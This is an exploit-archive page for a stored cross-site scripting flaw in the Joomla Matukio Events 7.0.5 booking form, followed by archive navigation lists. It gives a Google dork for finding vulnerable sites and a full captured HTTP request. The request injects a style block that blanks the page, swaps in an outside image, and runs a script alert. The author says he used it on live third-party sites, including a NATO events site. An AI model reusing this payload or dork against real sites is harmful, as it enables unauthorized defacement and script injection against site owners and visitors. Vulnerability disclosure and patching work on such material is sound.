Joomla Matukio Events 7.0.5 Cross Site Scripting

Joomla Matukio Events 7.0.5 Cross Site Scripting: Posted Mar 8, 2021; Authored by Vincent666 ibn Winnie; Joomla Matukio Events component version 7.0.5 suffers from a persistent cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 9584c12148fc8617de3641746b4f0230d3311b6572cc96e3b21fd7b640b96953; Download | Favorite | View

Joomla Matukio Events 7.0.5 Cross Site Scripting

# Exploit Title:Joomla Matukio Events  7.0.5 Stored XSS
# Date:08.03.2021
# Author: Vincent666 ibn Winnie
# Software Link: https://matukio.compojoom.com/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# My Youtube Channel : https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ
# Google Dorks: inurl:option=com_matukio


PoC:

I found simple , but interesting stored xss in Matukio Events.

https://matukio.compojoom.com/events/event/81-science/979-rocket-science

Press "Book Now":

Field "Comments" vulnerable to XSS and html code injection.

Put xss code and save this. It's works with different codes.

The code I like for the test:

https://pastebin.com/4V9sS7V3


Video:

https://youtu.be/HlTEcDqNxSM

Example on another site events.sto.nato.int

https://www.youtube.com/watch?v=pBY2UskIuNU



Host: matukio.compojoom.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)
Gecko/20100101 Firefox/86.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data;
boundary=---------------------------9492328303638924271813324098

Content-Length: 2816

Origin: https://matukio.compojoom.com

Connection: keep-alive

Referer: https://matukio.compojoom.com/events/book/979-rocket-science

Cookie: d9122e5739e92113272e5173db43cd67=72qdv1oufsi2avknr7614genno;
_ga=GA1.2.90714308.1615201744; _gid=GA1.2.178258541.1615201744

Upgrade-Insecure-Requests: 1

nrbooked=1&coupon_code=&field[3]=Mr&field[4]=&field[5]=azsxc&field[6]=ASD&field[8]=azsxc&field[9]=112233&field[10]=Zasx&field[11]=algeria&field[13]=vsdv@dklelw.de&field[14]=&field[15]=&field[16]=&field[17]=<style>body{visibility:hidden;}html{background:
url(https://img5.goodfon.ru/wallpaper/nbig/6/5d/kholst-kraska-mazki-abstraktsiia-canvas-paint-brush-strokes.jpg)
round;}</style><script>alert("Test
XSS")</script>&agb=Yes&revoke=Yes&uuid=&task=book.book&semid=979&formId=1&61c98812f3351c5686829fce5947bf84=1

(p.s.:
I don't publicly test the Joomla extensions anymore, but this time I
posted it publicly because I did xss art on the NATO site in this
component.)

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Joomla Matukio Events 7.0.5 Cross Site Scripting

Joomla Matukio Events 7.0.5 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Matukio Events 7.0.5 Cross Site Scripting

Share This

Joomla Matukio Events 7.0.5 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems